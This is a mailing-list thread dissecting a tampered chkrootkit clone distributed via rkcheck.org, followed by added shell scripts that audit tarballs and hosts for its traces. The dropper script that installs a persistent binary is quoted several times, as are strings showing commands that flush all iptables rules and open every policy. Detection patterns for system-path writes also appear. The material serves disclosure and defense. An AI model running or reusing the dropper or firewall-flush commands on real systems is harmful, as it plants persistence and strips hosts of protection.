> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists at netzkommune.com> wrote:
>
> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which was registered a few days ago and looks like a tampered version of chkrootkit. I hope nobody installed it anywhere; it seems to execute rkcheck/tests/.unit/test.sh which contains
>
> #!/bin/bash
>
> cp tests/.unit/test /usr/bin/rrsyncn
> chmod +x /usr/bin/rrsyncn
> rm -fr /etc/rc2.d/S98rsyncn
> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> /usr/bin/rrsyncn
> exit
>
> That doesn't look like something you'd want on your box...

I filed a report with Google about that domain (Google Safe Browsing), briefly describing what's been recounted here on this thread. It seems quite suspicious, agreed.

Has anyone started an analysis of the rrsyncn binary? The last few lines of a simple string dump are interesting... take note of what looks to be an IP address of 95.215.44.195.

/bin/sh
iptables -X 2> /dev/null
iptables -F 2> /dev/null
iptables -t nat -F 2> /dev/null
iptables -t nat -X 2> /dev/null
iptables -t mangle -F 2> /dev/null
iptables -t mangle -X 2> /dev/null
iptables -P INPUT ACCEPT 2> /dev/null
iptables -P FORWARD ACCEPT 2> /dev/null
iptables -P OUTPUT ACCEPT 2> /dev/null
udevd
95.215.44.195
;*3$"

> Cheers,
>
> Philip

Chris
> On 25.02.2015 at 21:55, Christopher Schulte <christopher at schulte.org> wrote:
>
>> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists at netzkommune.com> wrote:
>>
>> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which was registered a few days ago and looks like a tampered version of chkrootkit. I hope nobody installed it anywhere; it seems to execute rkcheck/tests/.unit/test.sh which contains
>>
>> #!/bin/bash
>>
>> cp tests/.unit/test /usr/bin/rrsyncn
>> chmod +x /usr/bin/rrsyncn
>> rm -fr /etc/rc2.d/S98rsyncn
>> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
>> /usr/bin/rrsyncn
>> exit
>>
>> That doesn't look like something you'd want on your box...
>
> I filed a report with Google about that domain (Google Safe Browsing), briefly describing what's been recounted here on this thread. It seems quite suspicious, agreed.
>
> Has anyone started an analysis of the rrsyncn binary? The last few lines of a simple string dump are interesting... take note of what looks to be an IP address of 95.215.44.195.
>
> /bin/sh
> iptables -X 2> /dev/null
> iptables -F 2> /dev/null
> iptables -t nat -F 2> /dev/null
> iptables -t nat -X 2> /dev/null
> iptables -t mangle -F 2> /dev/null
> iptables -t mangle -X 2> /dev/null
> iptables -P INPUT ACCEPT 2> /dev/null
> iptables -P FORWARD ACCEPT 2> /dev/null
> iptables -P OUTPUT ACCEPT 2> /dev/null
> udevd
> 95.215.44.195
> ;*3$"

95.215.44.195 is the IP of rkcheck.org. I contacted yourserver.se, who own the network.

Philip
Christopher Schulte <christopher at schulte.org> writes:

>> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists at netzkommune.com> wrote:
>>
>> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org
>> which was registered a few days ago and looks like a tampered version of
>> chkrootkit. I hope nobody installed it anywhere; it seems to execute
>> rkcheck/tests/.unit/test.sh which contains
>>
>> #!/bin/bash
>>
>> cp tests/.unit/test /usr/bin/rrsyncn
>> chmod +x /usr/bin/rrsyncn
>> rm -fr /etc/rc2.d/S98rsyncn
>> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
>> /usr/bin/rrsyncn
>> exit

Are you looking at the tarball from the "source code" link, http://rkcheck.org/download.php?file=rkcheck-1.4.3-src.tar.gz?

% tar -xvf rkcheck-1.4.3-src.tar.gz
x rkcheck/
x rkcheck/chkdirs.c
x rkcheck/README.chklastlog
x rkcheck/README.chkwtmp
x rkcheck/chkutmp.c
x rkcheck/chkrootkit
x rkcheck/chkrootkit.lsm
x rkcheck/check_wtmpx.c
x rkcheck/COPYRIGHT
x rkcheck/strings.c
x rkcheck/ifpromisc.c
x rkcheck/ACKNOWLEDGMENTS
x rkcheck/chklastlog.c: truncated gzip input
tar: Error exit delayed from previous errors.

I don't see a /tests/ directory or any directory under rkcheck.

Joseph
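The thread's advice boils down to "look inside the tarball before you run anything in it". The following script is an added example, not code from the thread or from the rkcheck/chkrootkit projects: it lists an archive without extracting it, flags hidden path components such as the tests/.unit directory Philip described, and pulls any *.sh member to stdout to grep it for writes into /usr/bin, /etc/rc*.d or /etc/init.d, chmod +x, or symlink creation. The sample archive it audits is constructed here to mirror the layout described above (the dropper text is the one quoted in the thread; the "binary" is a placeholder). It assumes POSIX sh, tar with -O support (GNU tar and bsdtar both have it), and a writable temp directory; SYSTEM_WRITE_RE and the function names are this example's own.

```shell
#!/bin/sh
# Added example: audit a tarball for hidden members and install-time scripts
# that write outside the source tree, before anything in it is executed.
# Assumes POSIX sh and a tar that supports -t (list) and -O (extract to stdout).

set -u

# Hypothetical pattern for this example: paths and commands a source release
# has no business touching at unpack time.
SYSTEM_WRITE_RE='(/usr/s?bin/|/etc/rc[0-9S]?\.d/|/etc/init\.d/|chmod \+x|ln -s )'

# Print suspicious members of the tar archive $1 and return 1 if any were found.
audit_tarball() {
    findings=$(
        tar -tf "$1" | while read -r member; do
            # Any component starting with '.' is hidden from a casual ls.
            case "$member" in
                */.*) echo "hidden member: $member" ;;
            esac
            # Shell scripts: read them straight out of the archive and look
            # for writes to system paths, +x bits or init-script symlinks.
            case "$member" in
                *.sh)
                    if tar -xOf "$1" "$member" 2>/dev/null | grep -Eq "$SYSTEM_WRITE_RE"; then
                        echo "install script touching system paths: $member"
                    fi ;;
            esac
        done
    )
    if [ -z "$findings" ]; then
        return 0
    fi
    printf '%s\n' "$findings"
    return 1
}

# Build a constructed sample archive at $1. With $2 = yes it carries the
# hidden tests/.unit directory and dropper script described in the thread;
# otherwise it is a plain source tree.
make_sample_tarball() {
    out="$1"
    with_dropper="${2:-no}"
    work=$(mktemp -d)
    mkdir -p "$work/rkcheck"
    printf '/* placeholder source file */\n' > "$work/rkcheck/chkdirs.c"
    if [ "$with_dropper" = yes ]; then
        mkdir -p "$work/rkcheck/tests/.unit"
        printf 'placeholder, not the real binary\n' > "$work/rkcheck/tests/.unit/test"
        cat > "$work/rkcheck/tests/.unit/test.sh" <<'EOF'
#!/bin/bash

cp tests/.unit/test /usr/bin/rrsyncn
chmod +x /usr/bin/rrsyncn
rm -fr /etc/rc2.d/S98rsyncn
ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
/usr/bin/rrsyncn
exit
EOF
    fi
    (cd "$work" && tar -cf "$out" rkcheck)
    rm -rf "$work"
}

# Demo: audit the constructed tampered archive.
sample=$(mktemp)
make_sample_tarball "$sample" yes
if audit_tarball "$sample"; then
    echo "no findings in $sample"
else
    echo "review $sample by hand before running anything from it"
fi
rm -f "$sample"
```

On a real download you would run `audit_tarball rkcheck-1.4.3-src.tar.gz` after gunzipping it (or swap in `tar -tzf`/`tar -xzOf`); a clean result only means nothing matched this pattern, not that the archive is safe, and it says nothing about a pre-built binary like rkcheck/chkrootkit in Joseph's listing.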
Note: 95.215.44.195 == rkcheck.org The web site certainly smells like a total scam... no indication whatsoever of who might be behind this allegedly helpful project. But they'd like me to just trust them and download their checker tool. Yea. Right. No thanks. But I give them an `E' for effort.
On Wed, 25 Feb 2015 20:55:43 +0000, Christopher Schulte wrote:

> > On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists at netzkommune.com> wrote:
> >
> > it felt pretty scammy to me, googling for the "worm" got me to
> > rkcheck.org which was registered a few days ago and looks like a
> > tampered version of chkrootkit. I hope nobody installed it anywhere;
> > it seems to execute rkcheck/tests/.unit/test.sh which contains
> >
> > #!/bin/bash
> >
> > cp tests/.unit/test /usr/bin/rrsyncn
> > chmod +x /usr/bin/rrsyncn
> > rm -fr /etc/rc2.d/S98rsyncn
> > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> > /usr/bin/rrsyncn
> > exit
> >
> > That doesn't look like something you'd want on your box...
>
> I filed a report with Google about that domain (Google Safe
> Browsing), briefly describing what's been recounted here on this
> thread. It seems quite suspicious, agreed.
>
> Has anyone started an analysis of the rrsyncn binary? The last few
> lines of a simple string dump are interesting... take note of what looks
> to be an IP address of 95.215.44.195.
>
> /bin/sh
> iptables -X 2> /dev/null
> iptables -F 2> /dev/null
> iptables -t nat -F 2> /dev/null
> iptables -t nat -X 2> /dev/null
> iptables -t mangle -F 2> /dev/null
> iptables -t mangle -X 2> /dev/null
> iptables -P INPUT ACCEPT 2> /dev/null
> iptables -P FORWARD ACCEPT 2> /dev/null
> iptables -P OUTPUT ACCEPT 2> /dev/null
> udevd
> 95.215.44.195
> ;*3$"
>
> > Cheers,
> >
> > Philip
>
> Chris

Seeing as no one's mentioned it yet... if your (Linux) box were running iptables, a reasonable assumption, then running those commands would remove and flush all your rules, leaving you with a firewall that accepted everything, as good as no firewall at all. And then...?

At least FreeBSD isn't the lowest-hanging fruit for these monkeys.

cheers, Ian
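Putting Chris's string dump and Ian's point together, a box that ran that tarball would show two things: the persistence test.sh drops (/usr/bin/rrsyncn plus the /etc/rc2.d/S98rsyncn symlink) and a filter table with every policy set to ACCEPT and no rules left. The script below is an added example, not code from the thread, that checks for both. It assumes POSIX sh; the ROOT prefix argument is this example's own convention so the file check can be pointed at a mounted image or a scratch directory, and the firewall check reads `iptables -S` output from stdin so it can run against a saved dump offline. The two iptables dumps embedded here are constructed samples, one in the flushed state the strings describe and one with ordinary rules. The check is only as good as these exact names and this exact flush sequence; an attacker can rename the binary, and ip6tables and nftables are not covered.

```shell
#!/bin/sh
# Added example: post-install check for the artifacts test.sh leaves behind
# and for the wide-open iptables state the rrsyncn strings would produce.
# Assumes POSIX sh. ROOT is a hypothetical prefix (use / for the live host).

set -u

# Report the files test.sh creates under $1. Returns 1 if anything was found.
# Only catches this specific sample; the names are trivial to change.
check_rrsyncn_artifacts() {
    root="${1%/}"
    hits=0
    for f in "$root/usr/bin/rrsyncn" "$root/etc/rc2.d/S98rsyncn"; do
        # -L is checked too so a dangling symlink still counts.
        if [ -e "$f" ] || [ -L "$f" ]; then
            if [ -L "$f" ]; then
                echo "found symlink $f -> $(readlink "$f")"
            else
                echo "found file $f"
            fi
            hits=$((hits + 1))
        fi
    done
    [ "$hits" -eq 0 ]
}

# Recreate, under prefix $1, what test.sh does to a live host, so the check
# can be exercised without installing anything. The binary is a placeholder.
seed_rrsyncn_artifacts() {
    root="${1%/}"
    mkdir -p "$root/usr/bin" "$root/etc/rc2.d"
    printf 'placeholder, not the real binary\n' > "$root/usr/bin/rrsyncn"
    chmod +x "$root/usr/bin/rrsyncn"
    ln -sf /usr/bin/rrsyncn "$root/etc/rc2.d/S98rsyncn"
}

# Read `iptables -S` output on stdin. Returns 1 when the filter table looks
# the way the strings dump would leave it: every policy ACCEPT, zero rules.
audit_iptables_dump() {
    accept_policies=0
    rules=0
    while read -r line; do
        case "$line" in
            "-P "*" ACCEPT") accept_policies=$((accept_policies + 1)) ;;
            "-A "*)          rules=$((rules + 1)) ;;
        esac
    done
    if [ "$accept_policies" -ge 3 ] && [ "$rules" -eq 0 ]; then
        echo "filter table wide open: all policies ACCEPT and no rules"
        return 1
    fi
    return 0
}

# Constructed sample dumps (not captured from any real host).
FLUSHED_DUMP='-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT'

INTACT_DUMP='-P INPUT DROP
-P FORWARD DROP
-P OUTPUT ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp --dport 22 -j ACCEPT'

# Demo against a scratch prefix and the two sample dumps.
scratch=$(mktemp -d)
seed_rrsyncn_artifacts "$scratch"
check_rrsyncn_artifacts "$scratch" || echo "-> persistence from test.sh present"
rm -rf "$scratch"
printf '%s\n' "$FLUSHED_DUMP" | audit_iptables_dump || echo "-> firewall flushed, investigate"
printf '%s\n' "$INTACT_DUMP" | audit_iptables_dump && echo "-> intact dump looks fine"
```

On a live Linux host this is `check_rrsyncn_artifacts /` and `iptables -S | audit_iptables_dump`, run as root. A clean result from both proves nothing about a host that was already compromised; if either fires, treat the machine as owned and rebuild rather than just deleting the files and reloading the rules.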